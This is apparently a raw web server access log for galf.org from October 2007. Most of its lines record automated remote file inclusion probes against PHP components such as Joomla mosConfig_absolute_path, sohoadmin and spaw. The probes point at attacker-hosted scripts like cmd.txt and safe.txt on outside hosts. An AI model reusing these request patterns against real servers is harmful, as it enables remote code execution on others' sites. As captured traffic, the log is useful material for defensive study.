203.157.182.9 - - [28/Oct/2007:12:00:03 -0700] "GET /index.php?pag=http://www.feuerwehr-erolzheim.de/contenido445/contenido/classes/did.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
203.157.182.9 - - [28/Oct/2007:12:00:06 -0700] "GET /logs/index.php?pag=http://www.feuerwehr-erolzheim.de/contenido445/contenido/classes/did.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
207.44.158.116 - - [28/Oct/2007:12:01:15 -0700] "GET /logs/access_070723.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.feuerwehr-erolzheim.de/contenido445/contenido/classes/ilg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.44.158.116 - - [28/Oct/2007:12:01:23 -0700] "GET /logs/access_070716.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.feuerwehr-erolzheim.de/contenido445/contenido/classes/ilg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
169.207.64.5 - - [28/Oct/2007:12:02:38 -0700] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://udplink.t35.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
169.207.64.5 - - [28/Oct/2007:12:02:38 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://udplink.t35.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
12.160.216.29 - - [28/Oct/2007:12:03:12 -0700] "GET /logs//administrator/components/com_serverstat/inst.serverstat.php?mosConfig_absolute_path=http://www.ownsyou.kit.net/evals/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
12.160.216.29 - - [28/Oct/2007:12:03:13 -0700] "GET //administrator/components/com_serverstat/inst.serverstat.php?mosConfig_absolute_path=http://www.ownsyou.kit.net/evals/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
216.105.96.105 - - [28/Oct/2007:12:03:41 -0700] "GET /logs//vwar/convert/mvcw.php?step=1&vwar_root=http://www.javva.com/n? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
169.207.64.5 - - [28/Oct/2007:12:04:15 -0700] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://udplink.t35.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
169.207.64.5 - - [28/Oct/2007:12:04:15 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://udplink.t35.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
88.234.135.36 - - [28/Oct/2007:12:04:51 -0700] "GET /logs/access_071008.log HTTP/1.1" 206 196608 "http://search.eztools.com/administrator/components/com_remository/admin.remository.php/components/com_galleria/components/com_simpleboard/image_upload.php/administrator/components/com_mmp/help.mmp.php/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" "www.galf.org"
211.202.2.69 - - [28/Oct/2007:12:04:56 -0700] "GET /logs/access_071008.log//skin/zero_vote/error.php?dir=http://www.calebsfunzone.com/editor/cmd? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
211.202.2.69 - - [28/Oct/2007:12:04:56 -0700] "GET //skin/zero_vote/error.php?dir=http://www.calebsfunzone.com/editor/cmd? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
211.202.2.69 - - [28/Oct/2007:12:04:57 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.calebsfunzone.com/editor/cmd? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
211.202.2.69 - - [28/Oct/2007:12:05:05 -0700] "GET /logs/access_071001.log//skin/zero_vote/error.php?dir=http://www.calebsfunzone.com/editor/cmd? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
91.121.90.91 - - [28/Oct/2007:12:06:57 -0700] "GET /logs/redaxo/include/addons/image_resize/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.ownsyou.kit.net/evals/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
91.121.90.91 - - [28/Oct/2007:12:06:58 -0700] "GET /redaxo/include/addons/image_resize/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.ownsyou.kit.net/evals/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
194.116.187.16 - - [28/Oct/2007:12:07:38 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.lostwarriors.com//vwar/convert/main.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.galf.org"
194.116.187.16 - - [28/Oct/2007:12:07:38 -0700] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.lostwarriors.com//vwar/convert/main.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.galf.org"
72.30.216.93 - - [28/Oct/2007:12:09:56 -0700] "GET /logs/access_071008.log HTTP/1.0" 200 589824 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
91.121.90.91 - - [28/Oct/2007:12:11:40 -0700] "GET /logs/sohoadmin/client_files/shopping_cart/pgm-shopping_css.inc.php?_SESSION[docroot_path]=http://www.ownsyou.kit.net/evals/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
91.121.90.91 - - [28/Oct/2007:12:11:41 -0700] "GET /sohoadmin/client_files/shopping_cart/pgm-shopping_css.inc.php?_SESSION[docroot_path]=http://www.ownsyou.kit.net/evals/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
68.180.250.121 - - [28/Oct/2007:12:12:36 -0700] "GET /logs/access_070903.log HTTP/1.0" 200 524288 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
66.232.105.218 - - [28/Oct/2007:12:12:39 -0700] "GET /logs/access_070730.log//include/write.php?dir=http://www.hotel-am-waldbad.de/redaxo/include/addons/image_resize/pages/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.232.105.218 - - [28/Oct/2007:12:12:45 -0700] "GET //include/write.php?dir=http://www.hotel-am-waldbad.de/redaxo/include/addons/image_resize/pages/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.232.105.218 - - [28/Oct/2007:12:12:45 -0700] "GET /logs//include/write.php?dir=http://www.hotel-am-waldbad.de/redaxo/include/addons/image_resize/pages/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
91.121.90.91 - - [28/Oct/2007:12:13:24 -0700] "GET /logs//sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.ownsyou.kit.net/evals/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
91.121.90.91 - - [28/Oct/2007:12:13:25 -0700] "GET //sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.ownsyou.kit.net/evals/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
66.232.105.218 - - [28/Oct/2007:12:13:29 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://stopandbid.com/uplimg/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.6.28.204 - - [28/Oct/2007:12:14:51 -0700] "GET /logs/access_070618.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
216.246.58.151 - - [28/Oct/2007:12:16:04 -0700] "GET /logs/index.php?file=http://www.karadenizgaleri.com/karadenizforum/avatars/event/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.246.58.151 - - [28/Oct/2007:12:16:04 -0700] "GET /index.php?file=http://www.karadenizgaleri.com/karadenizforum/avatars/event/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
91.121.90.91 - - [28/Oct/2007:12:16:34 -0700] "GET /sohoadmin/program/includes/shared_functions.php?_SESSION[docroot_path]=http://www.ownsyou.kit.net/evals/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
194.126.193.82 - - [28/Oct/2007:12:22:58 -0700] "GET /logs/modules/xfsection/modify.php?dir_module=http://www.dunakom.hu/userimages/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
194.126.193.82 - - [28/Oct/2007:12:22:59 -0700] "GET /modules/xfsection/modify.php?dir_module=http://www.dunakom.hu/userimages/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
66.232.105.218 - - [28/Oct/2007:12:25:09 -0700] "GET /logs/components/minibb/index.php?absolute_path%22http://www.hotel-am-waldbad.de/redaxo/include/addons/image_resize/pages/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
66.232.105.218 - - [28/Oct/2007:12:25:10 -0700] "GET /components/minibb/index.php?absolute_path%22http://www.hotel-am-waldbad.de/redaxo/include/addons/image_resize/pages/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
203.157.182.9 - - [28/Oct/2007:12:25:20 -0700] "GET /logs/access_070806.log/index.php?pag=http://www.feuerwehr-erolzheim.de/contenido445/contenido/classes/did.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.232.105.218 - - [28/Oct/2007:12:25:36 -0700] "GET /logs/modules/mod_calendar.php?absolute_path%22http://stopandbid.com/uplimg/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
66.232.105.218 - - [28/Oct/2007:12:25:39 -0700] "GET /modules/mod_calendar.php?absolute_path%22http://stopandbid.com/uplimg/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
91.121.69.26 - - [28/Oct/2007:12:26:05 -0700] "GET /logs/plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
91.121.69.26 - - [28/Oct/2007:12:26:06 -0700] "GET /plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
65.55.208.230 - - [28/Oct/2007:12:26:21 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
65.55.208.230 - - [28/Oct/2007:12:26:21 -0700] "GET /cendoc/?S=A HTTP/1.0" 200 510 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
66.232.105.218 - - [28/Oct/2007:12:26:37 -0700] "GET /logs/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path%22http://stopandbid.com/uplimg/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
66.232.105.218 - - [28/Oct/2007:12:26:37 -0700] "GET /components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path%22http://stopandbid.com/uplimg/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
84.19.176.40 - - [28/Oct/2007:12:28:40 -0700] "GET /logs/saveserver.php?thisdir=http://trezzi.4irc.com/scan_Bot/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
84.19.176.40 - - [28/Oct/2007:12:28:41 -0700] "GET /saveserver.php?thisdir=http://trezzi.4irc.com/scan_Bot/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
84.19.176.40 - - [28/Oct/2007:12:28:44 -0700] "GET /logs/access.log/saveserver.php?thisdir=http://trezzi.4irc.com/scan_Bot/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
65.55.208.233 - - [28/Oct/2007:12:31:16 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
65.55.208.233 - - [28/Oct/2007:12:31:16 -0700] "GET /?D=A HTTP/1.0" 200 1032 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
85.214.92.181 - - [28/Oct/2007:12:32:17 -0700] "GET //announcements.php?phpraid_dir=http://www.woman.fromland.net//language/lang_german/r8.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.214.92.181 - - [28/Oct/2007:12:34:21 -0700] "GET //components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.woman.fromland.net//language/lang_german/r8.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
205.234.135.119 - - [28/Oct/2007:12:38:53 -0700] "GET /logs//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://qlzr.net/safe? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.135.119 - - [28/Oct/2007:12:38:53 -0700] "GET //components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://qlzr.net/safe? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.225.214.176 - - [28/Oct/2007:12:39:26 -0700] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://www.3002.net/gallery/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.225.214.176 - - [28/Oct/2007:12:39:26 -0700] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.3002.net/gallery/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.58.164.193 - - [28/Oct/2007:12:40:09 -0700] "GET /logs/access.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.dunakom.hu/userimages/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
207.58.164.193 - - [28/Oct/2007:12:40:09 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.dunakom.hu/userimages/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
207.58.164.193 - - [28/Oct/2007:12:40:10 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.dunakom.hu/userimages/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
207.58.164.193 - - [28/Oct/2007:12:43:05 -0700] "GET /logs/access_071008.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.dunakom.hu/userimages/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
209.62.7.50 - - [28/Oct/2007:12:43:12 -0700] "GET /logs/access_070806.log/index.php?x=http://www.dunakom.hu/userimages/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.62.7.50 - - [28/Oct/2007:12:43:13 -0700] "GET /index.php?x=http://www.dunakom.hu/userimages/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
209.62.7.50 - - [28/Oct/2007:12:43:13 -0700] "GET /logs/index.php?x=http://www.dunakom.hu/userimages/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.62.7.50 - - [28/Oct/2007:12:44:33 -0700] "GET /logs/access_070806.log/index.php?open=http://www.dunakom.hu/userimages/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.62.7.50 - - [28/Oct/2007:12:44:33 -0700] "GET /index.php?open=http://www.dunakom.hu/userimages/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
209.62.7.50 - - [28/Oct/2007:12:44:33 -0700] "GET /logs/index.php?open=http://www.dunakom.hu/userimages/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
204.14.110.100 - - [28/Oct/2007:12:44:48 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://freewebs.com/lamercrew/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
12.160.216.29 - - [28/Oct/2007:12:45:38 -0700] "GET /logs//sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.ownsyou.kit.net/evals/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
12.160.216.29 - - [28/Oct/2007:12:45:39 -0700] "GET //sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.ownsyou.kit.net/evals/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
209.62.7.50 - - [28/Oct/2007:12:45:47 -0700] "GET /logs/access_070730.log/index.php?x=http://www.dunakom.hu/userimages/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.225.253.129 - - [28/Oct/2007:12:45:50 -0700] "GET /logs/access.log//spaw/dialogs/img_library.php?spaw_root=http://qlzr.net/links.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.225.253.129 - - [28/Oct/2007:12:45:51 -0700] "GET //spaw/dialogs/img_library.php?spaw_root=http://qlzr.net/links.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.225.253.129 - - [28/Oct/2007:12:45:51 -0700] "GET /logs//spaw/dialogs/img_library.php?spaw_root=http://qlzr.net/links.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.225.253.129 - - [28/Oct/2007:12:45:53 -0700] "GET /logs/access.log//spaw/dialogs/img_library.php?spaw_root=http://qlzr.net/links.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.225.253.129 - - [28/Oct/2007:12:45:53 -0700] "GET //spaw/dialogs/img_library.php?spaw_root=http://qlzr.net/links.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.225.253.129 - - [28/Oct/2007:12:45:54 -0700] "GET /logs//spaw/dialogs/img_library.php?spaw_root=http://qlzr.net/links.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
85.214.92.181 - - [28/Oct/2007:12:46:02 -0700] "GET /logs//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.woman.fromland.net//language/lang_german/r8.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
12.160.216.29 - - [28/Oct/2007:12:46:16 -0700] "GET /logs//sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.ownsyou.kit.net/evals/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
12.160.216.29 - - [28/Oct/2007:12:46:16 -0700] "GET //sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.ownsyou.kit.net/evals/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
216.246.58.151 - - [28/Oct/2007:12:46:38 -0700] "GET /logs/index.php?file=http://www.karadenizgaleri.com/karadenizforum/avatars/event/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.246.58.151 - - [28/Oct/2007:12:46:38 -0700] "GET /index.php?file=http://www.karadenizgaleri.com/karadenizforum/avatars/event/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.93.209.250 - - [28/Oct/2007:12:48:23 -0700] "GET /logs/components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.reachne.org//components/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
69.93.209.250 - - [28/Oct/2007:12:48:23 -0700] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.reachne.org//components/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
91.121.69.26 - - [28/Oct/2007:12:49:55 -0700] "GET /logs/plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
91.121.69.26 - - [28/Oct/2007:12:49:56 -0700] "GET /plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
66.225.253.129 - - [28/Oct/2007:12:51:22 -0700] "GET /logs/access_071001.log//spaw/dialogs/img_library.php?spaw_root=http://qlzr.net/links.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.225.253.129 - - [28/Oct/2007:12:51:22 -0700] "GET /logs/access_071001.log//spaw/dialogs/img_library.php?spaw_root=http://qlzr.net/links.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.62.7.50 - - [28/Oct/2007:12:51:22 -0700] "GET /logs/access_070723.log/index.php?open=http://www.dunakom.hu/userimages/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
62.1.205.128 - - [28/Oct/2007:12:51:52 -0700] "GET /logs/access.log//spaw/dialogs/img_library.php?spaw_root=http://qlzr.net/links.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
62.1.205.128 - - [28/Oct/2007:12:51:52 -0700] "GET //spaw/dialogs/img_library.php?spaw_root=http://qlzr.net/links.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
62.1.205.128 - - [28/Oct/2007:12:51:53 -0700] "GET /logs//spaw/dialogs/img_library.php?spaw_root=http://qlzr.net/links.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
66.232.105.218 - - [28/Oct/2007:12:53:22 -0700] "GET /logs/modules/mod_calendar.php?absolute_path%22http://stopandbid.com/uplimg/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
66.232.105.218 - - [28/Oct/2007:12:53:22 -0700] "GET /modules/mod_calendar.php?absolute_path%22http://stopandbid.com/uplimg/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
200.85.47.250 - - [28/Oct/2007:12:53:58 -0700] "GET /logs/access.log//spaw/dialogs/img_library.php?spaw_root=http://qlzr.net/links.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
200.85.47.250 - - [28/Oct/2007:12:53:58 -0700] "GET //spaw/dialogs/img_library.php?spaw_root=http://qlzr.net/links.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
200.85.47.250 - - [28/Oct/2007:12:53:59 -0700] "GET /logs//spaw/dialogs/img_library.php?spaw_root=http://qlzr.net/links.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
66.232.105.218 - - [28/Oct/2007:12:54:08 -0700] "GET /logs/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path%22http://stopandbid.com/uplimg/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
89.111.176.32 - - [28/Oct/2007:12:54:10 -0700] "GET /logs/components/com_cpg/cpg.php?mosConfig_absolute_path=http://ownz-you.com/kiddies/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
89.111.176.32 - - [28/Oct/2007:12:54:10 -0700] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://ownz-you.com/kiddies/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
66.232.105.218 - - [28/Oct/2007:12:54:13 -0700] "GET /components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path%22http://stopandbid.com/uplimg/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
66.225.214.176 - - [28/Oct/2007:12:56:23 -0700] "GET /logs/principal.php?cmd=http://www.3002.net/gallery/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.225.214.176 - - [28/Oct/2007:12:56:23 -0700] "GET /principal.php?cmd=http://www.3002.net/gallery/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
85.92.73.80 - - [28/Oct/2007:12:56:44 -0700] "GET /logs/components/com_cpg/cpg.php?mosConfig_absolute_path=http://intranet.stantonmortgage.com/includes/pen.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
85.92.73.80 - - [28/Oct/2007:12:56:44 -0700] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://intranet.stantonmortgage.com/includes/pen.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
85.92.73.80 - - [28/Oct/2007:12:56:45 -0700] "GET /logs/components/com_cpg/cpg.php?mosConfig_absolute_path=http://intranet.stantonmortgage.com/includes/pen.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
85.92.73.80 - - [28/Oct/2007:12:56:45 -0700] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://intranet.stantonmortgage.com/includes/pen.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.62.7.50 - - [28/Oct/2007:12:56:49 -0700] "GET /logs/access_070723.log/index.php?include=http://www.dunakom.hu/userimages/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.62.7.50 - - [28/Oct/2007:12:56:49 -0700] "GET /index.php?include=http://www.dunakom.hu/userimages/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.62.7.50 - - [28/Oct/2007:12:56:49 -0700] "GET /logs/index.php?include=http://www.dunakom.hu/userimages/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.13.228.115 - - [28/Oct/2007:12:57:11 -0700] "GET /logs//classes/adodbt/sql.php?classes_dir=http://www.familie-lasch.de/reports/idmic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.13.228.115 - - [28/Oct/2007:12:57:11 -0700] "GET //classes/adodbt/sql.php?classes_dir=http://www.familie-lasch.de/reports/idmic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
194.93.130.25 - - [28/Oct/2007:12:58:23 -0700] "GET /logs/principal.php?cmd=http://www.hotel-am-waldbad.de/redaxo/include/addons/image_resize/pages/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
194.93.130.25 - - [28/Oct/2007:12:58:23 -0700] "GET /logs/principal.php?cmd=http://www.hotel-am-waldbad.de/redaxo/include/addons/image_resize/pages/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
194.93.130.25 - - [28/Oct/2007:12:58:23 -0700] "GET /logs/principal.php?cmd=http://www.hotel-am-waldbad.de/redaxo/include/addons/image_resize/pages/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
194.93.130.25 - - [28/Oct/2007:12:58:23 -0700] "GET /logs/principal.php?cmd=http://www.hotel-am-waldbad.de/redaxo/include/addons/image_resize/pages/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
194.93.130.25 - - [28/Oct/2007:12:58:23 -0700] "GET /logs/principal.php?cmd=http://www.hotel-am-waldbad.de/redaxo/include/addons/image_resize/pages/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
194.93.130.25 - - [28/Oct/2007:12:58:23 -0700] "GET /logs/principal.php?cmd=http://www.hotel-am-waldbad.de/redaxo/include/addons/image_resize/pages/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
194.93.130.25 - - [28/Oct/2007:12:58:23 -0700] "GET /principal.php?cmd=http://www.hotel-am-waldbad.de/redaxo/include/addons/image_resize/pages/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
194.93.130.25 - - [28/Oct/2007:12:58:23 -0700] "GET /principal.php?cmd=http://www.hotel-am-waldbad.de/redaxo/include/addons/image_resize/pages/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
194.93.130.25 - - [28/Oct/2007:12:58:23 -0700] "GET /principal.php?cmd=http://www.hotel-am-waldbad.de/redaxo/include/addons/image_resize/pages/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
194.93.130.25 - - [28/Oct/2007:12:58:23 -0700] "GET /principal.php?cmd=http://www.hotel-am-waldbad.de/redaxo/include/addons/image_resize/pages/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
194.93.130.25 - - [28/Oct/2007:12:58:23 -0700] "GET /principal.php?cmd=http://www.hotel-am-waldbad.de/redaxo/include/addons/image_resize/pages/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
